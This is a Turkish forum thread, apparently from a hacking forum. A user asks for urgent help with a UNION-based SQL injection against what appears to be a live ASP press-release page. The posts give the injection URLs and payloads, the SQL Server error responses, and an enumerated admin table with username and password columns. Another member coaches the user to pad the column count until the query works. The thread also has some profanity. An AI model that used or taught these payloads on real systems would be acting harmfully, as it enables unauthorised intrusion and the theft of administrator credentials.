Sql İnjeksiyon Acil Yardım

1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    syklops
    syklops's avatar
    Erkek

-1 union+select+0,MemberID,3,1+from+Members

tablo adı Members kolan adı MemberID baska bişi yok yukardakı sorguyu yazdıgımda

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.

/asp/lib/database.asp, line 53

bu hatayı verıyor galiba sorguda bir hata var

sorgunun kullanımı boyle olması lazım ama -1 union+select+0,Bulduğunuz Kolon Adı,3,Kaç Kolon Varsa +from+Bulduğunuz Tablo Adı

ama nerde hatam var bılemıyorum yardım acilinden  

2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    cnr437
    cnr437's avatar
    Banlanmış Üye
    Erkek
    hacı nie ikişer ikişer açıyon konuları??

Bizim olduğumuz her yerde herşey bizim yüzümüzden olmuştur. Ben benim amk bana bişey olmasın!
  3. KısayolKısayol reportŞikayet pmÖzel Mesaj
    syklops
    syklops's avatar
    Erkek
    hacı ilk sefer actım da bir bok bilmiyodum sonra bayagı bir boklar ogrendım hatta ilk konumun cevabını buldum yazıcam bır ara şimdiki sorun daha önemli onuda bulursam yazıcam da burdakı ustalardan yardım gelirse iyi olur
  4. KısayolKısayol reportŞikayet pmÖzel Mesaj
    renegadealien
    renegadealien's avatar
    Üstün Hizmet Madalyası Savaş Madalyası Başarı Madalyası Üstün Hizmet Madalyası Developer Madalyası
    Erkek

Hocam union birleştirdiği sqllerdeki column yani sutun sayılarının aynı ve eşit sayıda olmasını ister...

Sen doğru sütunu bulana kada 0,0,0, die eklemeye devam et...

10.05.2013 tarihli google arama sonucu : Aradığınız - "herşeyin hayırlısı rampanın bayırlısı" - ile ilgili hiçbir arama sonucu mevcut değil. Kendi özlü sözümdür, kaynak belirterek kullanınız.
  5. KısayolKısayol reportŞikayet pmÖzel Mesaj
    syklops
    syklops's avatar
    Erkek
    saol rene hocam babam geldi kızıyor aq bagımlı oldum dıye artık yarın yapıcam cok saol yardım icin
  6. KısayolKısayol reportŞikayet pmÖzel Mesaj
    syklops
    syklops's avatar
    Erkek

ben tablo adlalarını cektım tablo adı "tblAdmin" sonra col=1 col=2 dalan derken alayını cıkarıdm

1=lngAdminID

2=strUsername                                          

3=strPassword                                               

4=strName                                                 

5=strSurname                                              

6=strEmailAddress                                            bana bu cevabı verdi 

7=intAdminlevel

8=blnApproval

sonra ben bu union komutunu kullandım ama hatalı kullanıyorum sanrıım 

union+select+0,Bulduğunuz Kolon Adı,3,Kaç Kolon Varsa +from+Bulduğunuz Tablo Adı

sormak istedigim olay "bulundugunuz kolan adı" dan sonra gelen 3 un mantıgı nedır birde söyle bir sorgulama

yaptıgımda """basin_bultenleri.asp?YearID=2003+union+select+0,strUsername,3,8+from+tblAdmin"""" 

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.

bunu verdi sonra sunu yaptıgımda """"basin_bultenleri.asp?YearID=2003+union+select+0,strUsername,3,1,2,3,4+from+tblAdmin""""

bu seferde bunu verdi

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Operand type clash: text is incompatible with int

hocalar cok az kaldı bu inkesiyonda ama takıldım burda işte yardımlarınız için cok tesekkurler

Toplam Hit: 1136 Toplam Mesaj: 6